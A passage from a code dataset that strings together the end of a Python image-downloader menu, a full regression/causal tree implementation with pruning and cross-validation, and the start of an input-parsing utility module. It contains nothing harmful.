'输入序号启动指定功能\\n\\\n\t\t\t0.退出\\n\\\n\t\t\t1.显示Tag\\t\\t2.下载所有\\n\\\n\t\t\t3.继续下载\\t\\t4.选择下载\\n\\\n\t\t\t5.新建Tag\\t\\t6.删除Tag\\n\\\n\t\t\t7.添加画师\\t\\t8.删除画师\\n\\\n\t\t\t9.获取地址\\t\\ta.导入关注\\n'\n\t\tmode = input(msg)\n\t\tif mode == \"0\":\n\t\t\tbreak\n\t\telif mode == \"1\":\n\t\t\twork.prtag()\n\t\telif mode == \"2\":\n\t\t\twork.work()\n\t\telif mode == \"3\":\n\t\t\twork.work_down()\n\t\telif mode == \"4\":\n\t\t\twork.work_some()\n\t\telif mode == \"5\":\n\t\t\twork.add()\n\t\telif mode == \"6\":\n\t\t\twork.remove()\n\t\telif mode == \"7\":\n\t\t\twork.addP()\n\t\telif mode == \"8\":\n\t\t\twork.removeP()\n\t\telif mode == \"9\":\n\t\t\twork.work_get()\n\t\telif mode == \"a\":\n\t\t\twork.importP()\n\t\telse:\n\t\t\tprint(\"序号错误\", flush = True)\n\t\tif mode in [\"1\",\"2\",\"3\",\"4\",\"9\"]:\n\t\t\tprint(\"\\n回车以继续\", flush = True)\n\t\t\tinput()\n\t\telse:\n\t\t\tprint(\"\", flush = True)\ndef main():\n\tcreateFile(\"developer/\")\n\tcreateFile(\"thread/\")\n\tcontroller()\n\tpass\nif __name__ == '__main__':\n\tmain()\n","sub_path":"pSpider.py","file_name":"pSpider.py","file_ext":"py","file_size_in_byte":22944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21837508","text":"# Implementation of Regression Tree using CART algorithm\r\n__author__ = 'Ricardo'\r\n\r\nimport sys\r\nimport csv\r\nimport math\r\nimport copy\r\nimport time\r\nimport numpy as np\r\nfrom collections import Counter\r\nfrom numpy import * # genfromtxt\r\nimport LGRforSimulation1 as lr\r\n\r\n# reading from the file using numpy genfromtxt\r\ndef load_csv(file):\r\n X = genfromtxt(file, delimiter=\",\", dtype=str)\r\n # print(X)\r\n return X\r\n\r\n\r\ndef generate_set(x, Pi, CrossTest = 1):\r\n import numpy as np\r\n import random\r\n # print(Pi.shape)\r\n Feature_name = x[0, :10]\r\n # print('Feature_name :', Feature_name)\r\n # print(X[1:, 1:2].shape, X[1:, 9:].shape)\r\n # print(\"type: \", x[1])\r\n X = np.concatenate((x[1:, :], Pi), axis=1)\r\n # print(\"new X: \", X)\r\n random.seed(152)\r\n np.random.shuffle(X)\r\n # print(\"type: \", X[1])\r\n Label = X[:, -5:]\r\n # print(Label.shape, 'Label :', Label)\r\n Y = Label[:, 2]\r\n # print(Y.shape, \"Y is\", Y)\r\n # print(Y)\r\n j = Y.reshape(len(Y), 1)\r\n # print(j.shape, \"J is\", j)\r\n new_X = X[:, :10]\r\n # normalizing the data step\r\n # normalized_X = normalize(new_X)\r\n # print(\"Normal X\",normalized_X)\r\n # https://blog.csdn.net/qq_38150441/article/details/80488800\r\n final_X = np.concatenate((new_X, Label), axis=1)\r\n # print(\"np \", final_X)\r\n X = final_X\r\n size_of_rows = X.shape[0]\r\n # test data size is 10%\r\n num_test = round(0.3 * (X.shape[0]))\r\n start = 0\r\n end = num_test\r\n test_attri_list = []\r\n test_class_names_list = []\r\n training_attri_list = []\r\n training_class_names_list = []\r\n # ten fold cross-validation\r\n if CrossTest == 0:\r\n X_training = X[:, :-4]\r\n X_training = X_training.astype(np.float)\r\n # print(\"X:\", X_training)\r\n y_training = X[:, -4:]\r\n y_train = y_training.astype(np.float)\r\n # print(\"Y:\", y_train)\r\n training_attri_list.append(X_training)\r\n training_class_names_list.append(y_train)\r\n return Feature_name, None, None, training_attri_list, training_class_names_list\r\n for i in range(1):\r\n X_test = X[start:end, :]\r\n tmp1 = X[:start, :]\r\n tmp2 = X[end:, :]\r\n X_training = np.concatenate((tmp1, tmp2), axis=0)\r\n # X_training = X[:start,:]+ X[end: , :]\r\n y_test = X_test[:, -4:]\r\n # flatten https://blog.csdn.net/liuweiyuxiang/article/details/78220080\r\n # y_test = y_test.flatten()\r\n # print(\"y_test\", y_test)\r\n y_training = X_training[:, -4:]\r\n # y_training = y_training.flatten()\r\n y_train = y_training.astype(np.float)\r\n y_test = y_test.astype(np.float)\r\n X_test = X_test[:, :-4]\r\n X_training = X_training[:, :-4]\r\n X_test = X_test.astype(np.float)\r\n X_training = X_training.astype(np.float)\r\n test_attri_list.append(X_test)\r\n test_class_names_list.append(y_test)\r\n training_attri_list.append(X_training)\r\n training_class_names_list.append(y_train)\r\n # print(\"start is\",start)\r\n # print(\"end is\",end)\r\n start = end\r\n end = end + num_test\r\n # print(\"training_class_names_list\", training_class_names_list)\r\n return Feature_name, test_attri_list, test_class_names_list, training_attri_list, training_class_names_list # (X_test,y_test,X_training,y_train)\r\n\r\n\r\n# To calculate Tao_value , the input value should be transport by the get_remainder_dict function\r\ndef taoob (attri_list, check=0):\r\n # add a function tao !!\r\n # print(np.array(attri_list).shape)\r\n Treat_acc = 0\r\n Detail = False\r\n number_sample = len(attri_list)\r\n if number_sample == 0:\r\n # print('THIS IS SOME WRONG!!!')\r\n return 0\r\n #if number_sample < 150:\r\n # Detail = True\r\n sum0 = 0\r\n sum1 = 0\r\n tot0 = 0\r\n tot1 = 0\r\n for item in attri_list:\r\n label = item[1]\r\n # print(label)\r\n Y = label[0]\r\n '''\r\n if label[4]>0.95:\r\n label[4] = 0.95\r\n elif label[4] < 0.05:\r\n label[4] = 0.05\r\n '''\r\n label[3] = 0.5\r\n if label[1]:\r\n # print(label[1], label[4])\r\n sum1 += Y / label[3]\r\n tot1 += 1 / label[3]\r\n else:\r\n # print(label[1], 1 - label[4])\r\n sum0 += Y / (1 - label[3])\r\n tot0 += 1/(1 - label[3])\r\n '''\r\n print('sum0 = ', sum0)\r\n print('sum1 = ', sum1)\r\n print('tot0 = ', tot0)\r\n print('tot1 = ', tot1)\r\n '''\r\n if tot1 == 0:\r\n # Acc = 0\r\n return 0\r\n else:\r\n Acc = sum1/tot1\r\n if tot0 == 0:\r\n # Ref = 0\r\n return 0\r\n else:\r\n Ref = sum0/tot0\r\n taoob = Acc - Ref\r\n if Detail:\r\n print('number : ', number_sample)\r\n print('Acc = ', Acc, ' sum1: ', sum1, ' tot1 : ', tot1)\r\n print('Ref = ', Ref, ' sum0: ', sum0, ' tot0 : ', tot0)\r\n print('taoob : ', taoob)\r\n tao = sum(taoob)\r\n # print(\"tao : \", tao)\r\n return tao\r\n\r\n\r\ndef Prework(attri_list):\r\n temptdata = attri_list[0]\r\n # print(\"input data to get tao = \", temptdata)\r\n Tao_Value = taoob(temptdata)\r\n print('Tao_initial = ', Tao_Value)\r\n return Tao_Value\r\n\r\n\r\ndef build_dict_of_attributes_with_class_values(X, y): # ,feature):\r\n dict_of_attri_class_values = {}\r\n fea_list = []\r\n for i in range(X.shape[1]): # map all features\r\n fea = i\r\n l = X[:, i]\r\n # print(l)\r\n attribute_list = []\r\n count = 0\r\n # add all features to the dic and add the labal belong to every sample\r\n for j in l:\r\n # print('j: ', j)\r\n attribute_value = []\r\n attribute_value.append(j)\r\n attribute_value.append(y[count, :])\r\n attribute_list.append(attribute_value)\r\n count += 1\r\n dict_of_attri_class_values[fea] = attribute_list\r\n fea_list.append(fea)\r\n # print(\"dict_of_attri_class_values: \", dict_of_attri_class_values[0][1])\r\n return dict_of_attri_class_values, fea_list\r\n # features_with_max_gain_and_theta(dict_of_attri_class_values)\r\n\r\n\r\nclass Node(object):\r\n def __init__(self, val, lchild, rchild, feature, FeatureNumber, the, depth, leaf, Prune_value):\r\n self.root_value = val\r\n self.root_left = lchild\r\n self.root_right = rchild\r\n self.feature = feature\r\n self.theta = the\r\n self. Prune_value = Prune_value\r\n self.depth = depth\r\n self.leaf = leaf ### bool type\r\n self.FeatureNumber = FeatureNumber\r\n\r\n # method to identify if the node is leaf\r\n def is_leaf(self):\r\n return self.leaf\r\n\r\n # method to return threshold value\r\n def ret_thetha(self):\r\n return self.theta\r\n\r\n def ret_root_value(self):\r\n return self.root_value\r\n\r\n def ret_llist(self):\r\n return self.root_left\r\n\r\n def ret_rlist(self):\r\n return self.root_right\r\n\r\n def ret_depth(self):\r\n return self.depth\r\n\r\n\r\n def ret_feature(self):\r\n return self.feature\r\n\r\n\r\n def __repr__(self):\r\n return \"(%r, %s, %r, %r, %r, %r, %r)\" % (self.root_value, self.feature, self.theta, self.leaf, self.depth, self.root_left, self.root_right,)\r\n\r\n\r\n# Decision Tree object\r\nclass DecisionTree(object):\r\n fea_list = []\r\n\r\n def __init__(self):\r\n self.root_node = None\r\n\r\n # fit the decision tree\r\n def fit(self, dict_of_everything, cl_val, eta_min_val, Feature_name, Tao):\r\n root_node = self.create_decision_tree(dict_of_everything, cl_val, eta_min_val, Feature_name, Tao, 1) # ,fea_list)\r\n return root_node\r\n\r\n # calculate the mean values for all the class labels\r\n def cal_mean_class_values(self, class_values):\r\n mean_val = sum(class_values) / float(len(class_values))\r\n # print(mean_val)\r\n return mean_val\r\n\r\n # method to calculate best threshold value for each feature\r\n def cal_best_theta_value(self, ke, attri_list, minsize, maxbucketNum): ### The atri_listt is the value belong to one feature [1] is the label\r\n data = []\r\n # class_values = []\r\n # print(\"ke is: \", ke)\r\n # print(attri_list, ': is attri_list')\r\n for i in attri_list:\r\n # val = float(i[0])\r\n data.append(i[0])\r\n # class_values.append(i[1])\r\n # print('Classlabel: ', class_values)\r\n # print('data: ', data)\r\n ## We should calculate the tao value here not MSE\r\n # mse_parent = mean_sqaured_error(class_values)\r\n # print(\"mse for parent\",mse_parent)\r\n # print(\"Entropy of parrent\",entropy_of_par_attr)\r\n max_tao = 0\r\n tao_child = []\r\n theta = 0\r\n best_index_left_list = []\r\n best_index_right_list = []\r\n class_labels_list_after_split = []\r\n # print(data)\r\n # data = list(data)\r\n data.sort()\r\n '''\r\n data = set(data)\r\n data = list(data)\r\n '''\r\n # print('Data: ', data)\r\n bas_num = 10\r\n part = int(len(data) / bas_num)\r\n while part < minsize:\r\n bas_num -= 1\r\n part = int(len(data) / bas_num)\r\n while part >= maxbucketNum:\r\n bas_num += 1\r\n part = int(len(data) / bas_num)\r\n step = bas_num\r\n # print(\"step: \", step)\r\n prev = 0\r\n while (step + prev) < len(data):\r\n cur_theta = data[step + prev]\r\n # print(cur_theta)\r\n index_less_than_theta_list = []\r\n values_less_than_theta_list = []\r\n index_greater_than_theta_list = []\r\n values_greater_than_theta_list = []\r\n count = 0\r\n left_TreatNum = 0\r\n left_ControlNum = 0\r\n right_TreatNum = 0\r\n right_ControlNum = 0\r\n ### enumerate : both index and value:https://blog.csdn.net/liu_xzhen/article/details/79564455\r\n for c, j in enumerate(attri_list): # it could be optimized\r\n # print(c, 'J is : ', j)\r\n label = j[1]\r\n if j[0] <= cur_theta:\r\n # print(\"J[0] less\", j[0])\r\n values_less_than_theta_list.append(j)\r\n index_less_than_theta_list.append(c)\r\n if label[1]:\r\n left_TreatNum += 1\r\n else:\r\n left_ControlNum += 1\r\n else:\r\n # print(\"J[0] grater\",j[0])\r\n values_greater_than_theta_list.append(j)\r\n index_greater_than_theta_list.append(c)\r\n if label[1]:\r\n right_TreatNum += 1\r\n else:\r\n right_ControlNum += 1\r\n # count += 1\r\n\r\n # print('values_greater_than_theta_list: ', values_greater_than_theta_list)\r\n # print(\"Len og less list\",len(index_less_than_theta_list))\r\n # print(\"len og greater list\",len(index_greater_than_theta_list))\r\n if right_ControlNum < 20 or right_TreatNum < 20:\r\n # print(\"less minsize the num of left\", len(values_greater_than_theta_list), \" the num of righ: \", len(values_less_than_theta_list))\r\n prev += step\r\n continue\r\n if left_ControlNum < 20 or left_TreatNum < 20:\r\n # print(\"less minsize the num of left\", len(values_greater_than_theta_list), \" the num of righ: \", len(values_less_than_theta_list))\r\n prev += step\r\n continue\r\n tao_left = taoob(values_less_than_theta_list)\r\n # print(entropy_of_less_attribute)\r\n tao_right = taoob(values_greater_than_theta_list)\r\n ## we use sum sqaure here\r\n tao_split = tao_left ** 2 + tao_right ** 2\r\n if tao_split > max_tao:\r\n max_tao = tao_split\r\n tao_child = [tao_left, tao_right]\r\n theta = cur_theta\r\n best_index_left_list = index_less_than_theta_list\r\n best_index_right_list = index_greater_than_theta_list\r\n class_labels_list_after_split = values_less_than_theta_list + values_greater_than_theta_list\r\n prev += step\r\n # print('prev changed: ', prev)\r\n\r\n # print('split left: ', best_index_left_list)\r\n # print('split right: ', best_index_right_list)\r\n return max_tao, theta, best_index_left_list, best_index_right_list, class_labels_list_after_split, tao_child\r\n\r\n # method to select the best feature out of all the features.\r\n ### the dict_rep is\r\n def best_feature(self, dict_rep, minsize, maxbucketNum):\r\n # dict_theta = {}\r\n # dict_theta = {}\r\n key_value = None\r\n best_tao_split = -1\r\n best_theta = 0\r\n best_index_left_list = []\r\n best_index_right_list = []\r\n # best_mse_left = -1\r\n # best_mse_right = -1\r\n best_class_labels_after_split = []\r\n tmp_list = []\r\n best_tao_child = []\r\n for ke in dict_rep.keys():\r\n # print(\"Key now is\", ke, 'dict_rep is ', dict_rep[ke])\r\n tao_split, theta, index_left_list, index_right_list, class_labels_after_split, tao_child = self.cal_best_theta_value(ke, dict_rep[ke], minsize, maxbucketNum)\r\n # print(\"Best theta is\", ke,info_gain,theta,index_left_list)#,index_right_list)\r\n if tao_split > best_tao_split:\r\n best_tao_split = tao_split\r\n best_tao_child = tao_child\r\n best_theta = theta\r\n key_value = ke\r\n best_index_left_list = index_left_list\r\n best_index_right_list = index_right_list\r\n best_class_labels_after_split = class_labels_after_split\r\n tmp_list.append(key_value)\r\n # tmp_list.append(best_info_gain)\r\n tmp_list.append(best_theta)\r\n tmp_list.append(best_index_left_list)\r\n tmp_list.append(best_index_right_list)\r\n tmp_list.append(best_class_labels_after_split)\r\n tmp_list.append(best_tao_child)\r\n return tmp_list\r\n\r\n def get_remainder_dict(self, dict_of_everything, index_split):\r\n # global fea_list\r\n splited_dict = {}\r\n for ke in dict_of_everything.keys():\r\n val_list = []\r\n modified_list = []\r\n l = dict_of_everything[ke]\r\n # print(ke,index_left_split)\r\n # print(l)\r\n for i, v in enumerate(l):\r\n # print(i,v)\r\n if i not in index_split:\r\n # print(ke,i,v)\r\n modified_list.append(v)\r\n val_list.append(v[1])\r\n # print(modified_list)\r\n splited_dict[ke] = modified_list\r\n return splited_dict, val_list\r\n\r\n # method to create decision tree\r\n def create_decision_tree(self, dict_of_everything, class_val, eta_min_val, Featurename, Tao, depth): # ,fea_list):\r\n if len(class_val) < eta_min_val: ### if the number of the leaf < the minest number we having setting\r\n # majority_val = self.cal_mean_class_values(class_val)\r\n # print(\"Leaf node for less than 8 is\",majority_val, len(class_val))#,class_val)\r\n root_node = Node(Tao, None, None, None, None, None, depth, True, None)\r\n # print('Node number: ', len(class_val))\r\n return root_node\r\n else:\r\n print(\"the depth: \", depth)\r\n best_features_list = self.best_feature(dict_of_everything, 5, 10)\r\n # print(best_features_list)\r\n node_name = best_features_list[0]\r\n theta = best_features_list[1]\r\n index_left_split = best_features_list[2]\r\n print(\"Length of left split\", len(index_left_split))#,index_left_split)\r\n index_right_split = best_features_list[3]\r\n print(\"Length of right split\", len(index_right_split))#,index_right_split)\r\n ## use tao to replace the class_values\r\n class_values = best_features_list[4]\r\n Taovalue = best_features_list[5]\r\n if Taovalue == []:\r\n root_node = Node(Tao, None, None, None, None, None, depth, True, None)\r\n return root_node\r\n print(\"class values\", Taovalue)\r\n print(\"feature: \", Featurename[node_name], \"theta: \", theta)\r\n left_dict, class_val1 = self.get_remainder_dict(dict_of_everything, index_left_split)\r\n # print(\"index of left split\",len(index_left_split))\r\n # print(\"Left class values is\",len(class_val1))\r\n right_dict, class_val2 = self.get_remainder_dict(dict_of_everything, index_right_split)\r\n # print(\"indx of right split\",len(index_right_split))\r\n # print(\"right class values is\",len(class_val2))\r\n ##Add the tao value of each child note here!!!\r\n leftchild = self.create_decision_tree(left_dict, class_val1, eta_min_val, Featurename, Taovalue[0], depth+1)\r\n # leftchild = None\r\n rightchild = self.create_decision_tree(right_dict, class_val2, eta_min_val, Featurename, Taovalue[1], depth+1)\r\n root_node = Node(Tao, leftchild, rightchild, Featurename[node_name], node_name, theta, depth, False, None)\r\n return root_node\r\n\r\n # method to predict the values for test data\r\n def predict(self, X, root):\r\n predicted_list = []\r\n for row in X:\r\n y_pred = self.classify(row, root)\r\n predicted_list.append(y_pred)\r\n return predicted_list\r\n\r\n def classify(self, row, root):\r\n dict_test = {}\r\n for k, j in enumerate(row):\r\n dict_test[k] = j\r\n # print(dict_test)\r\n current_node = root\r\n while not current_node.leaf:\r\n if dict_test[current_node.root_value] <= current_node.theta:\r\n current_node = current_node.root_left\r\n else:\r\n current_node = current_node.root_right\r\n # print(current_node.root_value,dict_test[current_node.root_value], current_node.theta)\r\n return current_node.root_value\r\n\r\n\r\n'''\r\ndef CountChildren (Tree):\r\n Num_leaf = 0\r\n Num_node = 0\r\n if Tree.leaf:\r\n # print('Here ',Tree.feature)\r\n Num_leaf += 1\r\n else:\r\n Num_node += 1\r\n LeftTree = Tree.root_left\r\n # print('left Tree', LeftTree.root_left)\r\n # print('Tree leaf ', LeftTree.leaf)\r\n RightTree = Tree.root_right\r\n Add_node, Add_leaf = CountChildren(LeftTree)\r\n Num_leaf += Add_leaf\r\n Num_node += Add_node\r\n Add_node, Add_leaf = CountChildren(RightTree)\r\n Num_leaf += Add_leaf\r\n Num_node += Add_node\r\n # print('Num :', Num_node)\r\n return Num_node, Num_leaf\r\n'''\r\n\r\n\r\ndef CountChildren (Tree):\r\n Num_node = 0\r\n if Tree.root_left == None and Tree.root_right == None:\r\n # print('Here ',Tree.root_left, Tree.root_right)\r\n Num_node += 1\r\n else:\r\n # print('There ',Tree.root_left, Tree.root_right)\r\n LeftTree = Tree.root_left\r\n # print('left Tree', LeftTree.root_left)\r\n # print('Tree leaf ', LeftTree.leaf)\r\n RightTree = Tree.root_right\r\n Num_node += CountChildren(LeftTree)\r\n Num_node += CountChildren(RightTree)\r\n # print('Num :', Num_node)\r\n return Num_node\r\n\r\n\r\ndef Taocv(Label): # Edit\r\n # print('label: ', len(Label))\r\n number_sample = len(Label)\r\n if number_sample == 0:\r\n # print('THIS IS SOME WRONG!!!')\r\n return 0\r\n sum0 = 0\r\n sum1 = 0\r\n tot0 = 0\r\n tot1 = 0\r\n for item in Label:\r\n label = item\r\n # print('666 ', label[0])\r\n Y = label[0]\r\n label[3] = 0.5\r\n if label[1]:\r\n # print(label[1], label[4])\r\n sum1 += Y / label[3]\r\n tot1 += 1 / label[3]\r\n else:\r\n # print(label[1], 1 - label[4])\r\n sum0 += Y / (1 - label[3])\r\n tot0 += 1 / (1 - label[3])\r\n '''\r\n print('sum0 = ', sum0)\r\n print('sum1 = ', sum1)\r\n print('tot0 = ', tot0)\r\n print('tot1 = ', tot1)\r\n '''\r\n if tot1 == 0:\r\n Acc = 0\r\n else:\r\n Acc = sum1 / tot1\r\n if tot0 == 0:\r\n Ref = 0\r\n else:\r\n Ref = sum0 / tot0\r\n taoob = Acc - Ref\r\n # print('taoob : ', taoob)\r\n tao = sum(taoob)\r\n # print(\"tao : \", tao)\r\n return tao\r\n\r\n\r\n# calculate the number of leafs in these suntrees and the Q_prune of the tree and subtrees\r\ndef CountNodes(Tree): # EDIT\r\n if Tree.leaf:\r\n return 1, None, None, Tree.depth, Tree.root_value ** 2\r\n Node_left, Q_left_min, dic_left_prune, l_depth, left_leaf_value = CountNodes(Tree.root_left)\r\n Node_righ, Q_righ_min, dic_righ_prune, r_depth, righ_leaf_value = CountNodes(Tree.root_right)\r\n Node_number = Node_left + Node_righ\r\n leaf_value = left_leaf_value + righ_leaf_value\r\n dic_Q_prune = {}\r\n Q_min = 3333333\r\n if Q_left_min and Q_righ_min:\r\n if Q_left_min < Q_righ_min:\r\n dic_Q_prune = dic_left_prune\r\n Q_min = Q_left_min\r\n depth = l_depth\r\n else:\r\n dic_Q_prune = dic_righ_prune\r\n Q_min = Q_righ_min\r\n depth = r_depth\r\n elif Q_left_min:\r\n dic_Q_prune = dic_left_prune\r\n Q_min = Q_left_min\r\n depth = l_depth\r\n elif Q_righ_min:\r\n dic_Q_prune = dic_righ_prune\r\n Q_min = Q_righ_min\r\n depth = r_depth\r\n\r\n Q_prune = (leaf_value / Node_number - Tree.root_value ** 2) / (Node_number - 1)\r\n Tree.Prune_value = Q_prune\r\n if Q_prune < Q_min:\r\n Q_min = Q_prune\r\n dic_Q_prune = Tree\r\n depth = Tree.depth\r\n\r\n return Node_number, Q_min, dic_Q_prune, depth, leaf_value\r\n\r\n\r\ndef FindSubTree(Tree, Q, depth):\r\n SearchEnding = 0\r\n if Tree.leaf:\r\n return Tree, 0\r\n if Tree.Prune_value == Q and Tree.depth == depth:\r\n # print('Merge')\r\n Tree.root_left = None\r\n Tree.root_right = None\r\n Tree.leaf = True\r\n return Tree, 1\r\n Tree.root_left, SearchEnding = FindSubTree(Tree.root_left, Q, depth)\r\n if SearchEnding:\r\n return Tree, 1\r\n Tree.root_right, SearchEnding = FindSubTree(Tree.root_right, Q, depth)\r\n if SearchEnding:\r\n return Tree, 1\r\n return Tree, 0\r\n\r\n\r\n# to get the Q_prune value\r\ndef Find_least_Qp(Tree): # edit\r\n Node_number, Q_min, dic_Q_prune, depth, leaf_value = CountNodes(Tree)\r\n subTree, search = FindSubTree(Tree, Q_min, depth)\r\n alpha = Q_min\r\n return subTree, alpha\r\n\r\n\r\n# use test data to get MSE\r\ndef Get_MSE(Tree, X_test, Y_test, MSECV, MSETR): # edit\r\n if Tree.root_left == None and Tree.root_right == None:\r\n taocv = Taocv(Y_test) # you should change the form of the input data X_test\r\n MSECV += taocv * Tree.root_value\r\n MSETR += Tree.root_value ** 2\r\n return MSECV, MSETR\r\n else:\r\n X_left = []\r\n Y_left = []\r\n X_right = []\r\n Y_right = []\r\n Comp = Tree.theta\r\n key = Tree.FeatureNumber\r\n #print('Comp: ', Comp, 'Key: ', key)\r\n # print(X_test[0][key])\r\n for item, subset in enumerate(X_test):\r\n temp = subset\r\n if temp[key] < Comp:\r\n X_left.append(temp)\r\n Y_left.append(Y_test[item])\r\n else:\r\n X_right.append(temp)\r\n Y_right.append(Y_test[item])\r\n if len(Y_left) > 0:\r\n print('lY: ', len(Y_left))\r\n dCV, dTR = Get_MSE(Tree.root_left, X_left, Y_left, MSECV, MSETR)\r\n MSECV += dCV\r\n MSETR += dTR\r\n if len(Y_right) > 0:\r\n print('rY: ', len(Y_right))\r\n print('leaf: ', Tree.root_right.leaf)\r\n dCV, dTR = Get_MSE(Tree.root_right, X_right, Y_right, MSECV, MSETR)\r\n MSECV += dCV\r\n MSETR += dTR\r\n return MSECV, MSETR\r\n\r\n\r\ndef SetCross(Subtree, X_test, Y_test):\r\n Number = CountChildren(Subtree)\r\n print(\"the child node: \", Number)\r\n MSECV, MSETR = Get_MSE(Subtree, X_test, Y_test, 0, 0)\r\n print('MSECV: ', MSECV, 'MSETR: ', MSETR)\r\n Number_test = len(X_test)\r\n # print(\"Number of test data:\", Number_test)\r\n MSE_tao = -2 / Number_test * MSECV + MSETR / Number_test\r\n print('MSE_tao :', MSE_tao)\r\n return MSE_tao\r\n\r\n\r\n# prune in crossdata a\r\ndef CrossPprune(Tree, X_test, Y_test): # edit\r\n from copy import deepcopy\r\n # print('Y len :', len(Y_test))\r\n # print('Y:', Y_test[1])\r\n Tree_now = deepcopy(Tree)\r\n Nodes = []\r\n Paralpha = []\r\n Nodes.append(deepcopy(Tree_now))\r\n Paralpha.append(SetCross(deepcopy(Tree_now), X_test, Y_test))\r\n while 1:\r\n if Tree_now.root_left == None and Tree_now.root_right == None:\r\n # if Tree_now.leaf:\r\n # print('break tree:', Tree_now)\r\n break\r\n Tree_now, alpha = Find_least_Qp(Tree_now) # remember let tree.leaf = True after merge\r\n # print('Type: ', type(Tree_now))\r\n Nodes.append(deepcopy(Tree_now))\r\n Paralpha.append(alpha)\r\n print('Nodes: ', Nodes)\r\n print(\"len node: \", len(Nodes))\r\n print(\"Alpha: \", Paralpha)\r\n MSQ_min = 2147483648 # a small number -2147483648\r\n AnsList = []\r\n best_node = Tree\r\n best_alpha = None\r\n for item, sub in enumerate(Nodes):\r\n # print('each item :', sub)\r\n MSQ = SetCross(sub, X_test, Y_test)\r\n if MSQ <= MSQ_min:\r\n MSQ_min = MSQ\r\n best_node = sub\r\n best_alpha = Paralpha[item]\r\n AnsList.append(MSQ_min)\r\n AnsList.append(best_node)\r\n AnsList.append(best_alpha)\r\n return AnsList\r\n'''\r\ndef prune(Tree, alpha, k, eta_min):\r\n dif = 0\r\n rdif = 0\r\n LeftTree = Tree.root_left\r\n RightTree = Tree.root_right\r\n # pass\r\n if LeftTree.leaf == 0:\r\n LeftTree, ldif = prune(LeftTree, alpha, k, eta_min)\r\n dif += ldif\r\n k -= ldif\r\n if RightTree.leaf == 0:\r\n RightTree, rdif = prune(RightTree, alpha, k, eta_min)\r\n dif += rdif\r\n k -= rdif\r\n # if there still have child tree, which meaning that parent don't need to prune\r\n if not LeftTree.leaf or not RightTree.leaf:\r\n Tree.root_left = LeftTree\r\n Tree.root_right = RightTree\r\n return Tree, dif\r\n else: # decision if need prune\r\n Q_prune_child = LeftTree.root_value ** 2 + RightTree.root_value ** 2 - alpha * k\r\n Q_prune_parent = Tree.root_value ** 2 - alpha * (k - 1)\r\n if (Q_prune_child - Q_prune_parent) < eta_min:\r\n print('Prune happened! : ')\r\n Tree.leaf = True\r\n Tree.root_left = None\r\n Tree.root_right = None\r\n dif += 1\r\n # print('k: ', k)\r\n return Tree, dif\r\n'''\r\n\r\n\r\ndef main(num_arr, eta_min, Pi):\r\n eta_min_val = round(eta_min * num_arr.shape[0])\r\n print('eta_min_val : ', eta_min_val)\r\n # randomly shuffle the array so that we can divide the data into test/training\r\n # random_arr1 = random_numpy_array(num_arr)\r\n # divide data into test labels,test features,training labels, training features\r\n Feature_name, test_attri_list, test_class_names_list, training_attri_list, training_class_names_list = generate_set(num_arr, Pi, CrossTest=1)\r\n accu_count = 0\r\n test_fin_mse = 0\r\n pred_fin = 0\r\n # ten fold iteration for each eta-min value\r\n for i in range(1):\r\n # build a dictionary with class labels and respective features values belonging to that class\r\n dict_of_input, fea = build_dict_of_attributes_with_class_values(training_attri_list[i], training_class_names_list[i])\r\n # print(dict_of_input)\r\n # instantiate decision tree instance\r\n build_dict = DecisionTree()\r\n Tao_initial = Prework(dict_of_input)\r\n # build the decision tree model.\r\n dec = build_dict.fit(dict_of_input, training_class_names_list[i], eta_min_val, Feature_name, Tao_initial)\r\n # predict the class labels for test features\r\n '''\r\n l = build_dict.predict(test_attri_list[i], dec)\r\n # calculate the mean squared error measure for predicited test data\r\n mse = accuracy_for_predicted_values(test_class_names_list[i], l)\r\n # print(\"Number of right values are\",right,\"Wrong ones are\",wrong)\r\n # accu_count += accu\r\n test_fin_mse += mse\r\n # pred_fin += pred\r\n print(\"Average MSE for eta min of\", eta_min, \"is\", float(test_fin_mse) / 10) \r\n '''\r\n Num_node = CountChildren(dec)\r\n print('Num of node is ', Num_node)\r\n print('The original tree: ', dec)\r\n print('Y: ', len(test_class_names_list[0]))\r\n AnsList = CrossPprune(dec, test_attri_list[0], test_class_names_list[0])\r\n MSQ = AnsList[0]\r\n best_dec = AnsList[1]\r\n best_alpha = AnsList[2]\r\n print('The value of alpha: ', best_alpha)\r\n Num_node = CountChildren(best_dec)\r\n print('After pruning, num of node is ', Num_node)\r\n print(\"Average MSE for eta min of \", MSQ)\r\n print(\"Tree: \", best_dec)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n '''if len(sys.argv) == 2: ### sys.argv ???? what's mean ? is any wrong here?\r\n newfile = sys.argv[1]\r\n # load the data file and do the preprocessing\r\n num_arr = load_csv(newfile)\r\n # for each threshold value run the classifier for 10 cross-validation\r\n eta_min_list = [0.05, 0.10, 0.15, 0.20]\r\n for i in eta_min_list:\r\n main(num_arr, i)'''\r\n newfile = 'simulation1.csv'\r\n # load the data file and do the preprocessing\r\n Pi = lr.CaculatePi(newfile)\r\n num_arr = load_csv(newfile)\r\n # for each threshold value run the classifier for 10 cross-validation\r\n eta_min_list = [0.15, 0.20, 0.25, 0.30]\r\n main(num_arr, 0.1, Pi)\r\n\r\n #for i in eta_min_list:\r\n # main(num_arr, i, Pi)\r\n","sub_path":"SCT_compare_in_simulation1.py","file_name":"SCT_compare_in_simulation1.py","file_ext":"py","file_size_in_byte":29828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"464833176","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \n# Author: Mario S. Könz \n# Date: 31.03.2015 09:24:49 CEST\n# File: io_manip.py\n\nfrom .is_instance import *\nfrom .decorator_collection import listable\nfrom .termcolor import color\n\nfrom functools import partial\nimport re\n\n__all__ = [\"to_number\", \"to_str\", \"split_clean\", \"sstr\", \"time_int\", \"time_str\", \"ms_time_str\", \"dyn_time_str\", \"padding\"]\n\n@listable\ndef to_number(obj, strip_quotes = True):\n \"\"\"\n Tries to convert the input string into an int, if that doesn't work into a float and if that also fails, returns the string again.\n \"\"\"\n if is_dict(obj):\n return dict([(k, to_number(v, strip_quotes)) for k, v in obj.items()])\n \n try:\n res = int(obj)\n return res\n except:\n pass\n try:\n res = float(obj)\n return res\n except:\n pass\n \n test = obj.strip()\n if len(test) != 0 and test[0] == \"[\" and test[-1] == \"]\":\n #~ l = test[1:-1].split(\",\") #too easy, splits [[a, b], [c, d]] -> [[a<> b]<> [c<> d]]\n l = test[1:-1].split(\",\")\n l = 